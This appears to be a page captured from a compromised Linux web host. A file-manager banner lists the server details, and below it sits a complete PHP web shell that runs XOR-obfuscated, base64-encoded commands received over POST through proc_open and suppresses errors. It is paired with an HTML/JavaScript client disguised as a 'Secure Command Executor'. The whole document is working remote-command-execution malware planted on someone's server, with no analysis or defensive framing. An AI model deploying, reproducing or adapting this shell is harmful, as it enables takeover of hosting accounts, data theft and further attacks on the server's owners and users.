| Server IP : 3.138.164.131 / Your IP : 216.73.216.136 Web Server : Apache System : Linux ns1.techtime.me 4.18.0-147.8.1.el8.lve.1.x86_64 #1 SMP Mon Jun 29 09:55:57 EDT 2020 x86_64 User : injazaat ( 1471) PHP Version : 8.1.20 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/root/proc/thread-self/cwd/ |
Upload File : |
<?php
// --- SERVER-SIDE DECRYPTION & EXECUTION (V3 - proc_open bypass) ---
$secret_key = 'ChangeThisKey'; // MUST MATCH YOUR CLIENT
$param_name = 'd';
function xor_decrypt($data, $key) {
$out = ''; for ($i = 0; $i < strlen($data); $i++) { $out .= $data[$i] ^ $key[$i % strlen($key)]; } return $out;
}
// Targeted command execution using the available proc_open function.
function execute_command_proc_open($cmd) {
$descriptorspec = [
0 => ["pipe", "r"], // stdin
1 => ["pipe", "w"], // stdout
2 => ["pipe", "w"], // stderr
];
$pipes = [];
$process = proc_open($cmd, $descriptorspec, $pipes);
if (is_resource($process)) {
// We don't need to write to stdin
fclose($pipes[0]);
// Read the output from stdout
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
// Read any errors from stderr (they are merged by '2>&1' anyway)
$errors = stream_get_contents($pipes[2]);
fclose($pipes[2]);
// Close the process
proc_close($process);
return $output . $errors;
}
return "Error: proc_open failed to execute command.";
}
if (isset($_POST[$param_name])) {
@error_reporting(0); @ini_set('display_errors', 0);
$decoded_data = base64_decode($_POST[$param_name]);
$command = xor_decrypt($decoded_data, $secret_key);
// Use our new, targeted execution function
echo execute_command_proc_open($command . ' 2>&1');
exit();
}
// --- CLIENT-SIDE INTERFACE (HTML/JS) ---
// (The client-side code remains the same and is provided for completeness)
?>
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Secure Connector</title><style>body{font-family:"Courier New",Courier,monospace;background-color:#1e1e1e;color:#d4d4d4;margin:2em}.container{max-width:900px;margin:auto;border:1px solid #333;padding:20px;border-radius:5px}h2{color:#569cd6}input[type=text]{width:100%;box-sizing:border-box;padding:12px;margin:8px 0;background-color:#252526;color:#d4d4d4;border:1px solid #3c3c3c;border-radius:4px;font-size:1.1em}input[type=submit]{width:100%;padding:12px 20px;background-color:#0e639c;color:white;border:none;border-radius:4px;cursor:pointer;font-size:1.1em;font-weight:bold}input[type=submit]:hover{background-color:#1577b8}pre{margin-top:20px;padding:15px;background-color:#000;border:1px solid #333;white-space:pre-wrap;word-wrap:break-word;min-height:200px}</style></head><body><div class="container"><h2>Secure Command Executor</h2><form id="shell-form"><input type="text" id="command" name="command" required autocomplete="off" autofocus><input type="submit" value="Execute"></form><pre id="output">Output will appear here...</pre></div><script>const XOR_KEY='ChangeThisKey';const PARAM_NAME='d';function xorEncrypt(a,b){let c="";for(let d=0;d<a.length;d++)c+=String.fromCharCode(a.charCodeAt(d)^b.charCodeAt(d%b.length));return c}document.getElementById("shell-form").addEventListener("submit",async function(a){a.preventDefault();const b=document.getElementById("command").value,c=document.getElementById("output");c.textContent="Executing...";const d=xorEncrypt(b,XOR_KEY),e=btoa(d),f=new FormData;f.append(PARAM_NAME,e);try{const g=await fetch(window.location.href,{method:"POST",body:f});if(!g.ok)throw new Error(`Server returned error: ${g.status}`);const h=await g.text();c.textContent=h.trim()||"(Command executed with no output)"}catch(i){c.textContent="Error: "+i.message}});</script></body></html>